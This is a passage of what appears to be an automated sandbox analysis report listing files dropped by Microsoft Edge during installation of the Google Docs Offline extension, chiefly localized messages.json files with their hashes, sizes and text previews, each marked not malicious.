                                                                                                                                                                                                                                                                                      SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2778
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                      MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                      SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                      SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                      SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                      MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                      SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                      SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                      SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):936
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                      MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                      SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                      SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                      SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):3830
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                      MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                      SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                      SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                      SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1898
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                      MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                      SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                      SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                      SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                      MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                      SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                      SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                      SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):878
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                      MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                      SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                      SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                      SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2766
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                      MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                      SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                      SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                      SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):978
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                      MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                      SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                      SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                      SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):907
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                      MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                      SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                      SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                      SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):914
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                      MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                      SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                      SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                      SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                      MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                      SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                      SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                      SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\scoped_dir6828_1807396718\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1337
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                      MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                      SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                      SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
